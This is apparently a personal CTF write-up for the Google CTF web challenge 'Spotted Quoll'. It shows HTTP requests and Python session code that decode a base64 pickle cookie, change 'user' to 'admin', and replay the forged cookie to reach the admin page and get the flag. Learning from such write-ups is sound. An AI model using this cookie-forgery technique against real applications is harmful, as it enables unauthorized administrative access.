2 minute read


I participated in the Google CTF this weekend and really enjoyed the challenges. Here is a write-up of one of my solutions.


Spotted Quoll was a web challenge worth 50 points. The details of the challenge are in the image below.


I loaded up the blog and looked for any clues:



I started up burp and reloaded the page. I navigated to the /admin section of the blog and received an error:


A cookie called “obsoletePickle” was being passed with my requests.

      GET / HTTP/1.1
      Host: spotted-quoll.ctfcompetition.com
      User-Agent: foo
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate, br
      Cookie: obsoletePickle=KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu
      Connection: close

I recognized the pickle module from my python studies.

  The pickle module implements a fundamental, but powerful algorithm for serializing and de-serializing a Python object structure.

I loaded up the string in python and decoded it:

$ python
>>> import pickle
>>> import base64
>>> pickle.loads('KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu'.decode('base64'))
{'python': 'pickles', 'subtle': 'hint', 'user': None}

Interesting - it clearly shows ‘user’ with no value. Let’s modify the cookie to change the user to ‘admin’.

>>> pickle.dumps({'python': 'pickles', 'subtle': 'hint', 'user': 'admin'})
>>> p = pickle.dumps({'python': 'pickles', 'subtle': 'hint', 'user': 'admin'})
>>> msg = base64.b64encode(p)
>>> print msg
>>> pickle.loads('KGRwMApTJ3B5dGhvbicKcDEKUydwaWNrbGVzJwpwMgpzUydzdWJ0bGUnCnAzClMnaGludCcKcDQKc1MndXNlcicKcDUKUydhZG1pbicKcDYKcy4='.decode('base64'))
{'python': 'pickles', 'subtle': 'hint', 'user': 'admin'}””

Now instead of user being ‘None’ it is ‘admin’:

  {'python': 'pickles', 'subtle': 'hint', 'user': admin}

I reloaded the /admin page and submitted my modified cookie.

  GET /admin HTTP/1.1
  Host: spotted-quoll.ctfcompetition.com
  User-Agent: foo
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate, br
  Cookie: obsoletePickle=KGRwMApTJ3B5dGhvbicKcDEKUydwaWNrbGVzJwpwMgpzUydzdWJ0bGUnCnAzClMnaGludCcKcDQKc1MndXNlcicKcDUKUydhZG1pbicKcDYKcy4=
  Connection: close


Success! The flag is “CTF{but_wait,theres_more.if_you_call}”

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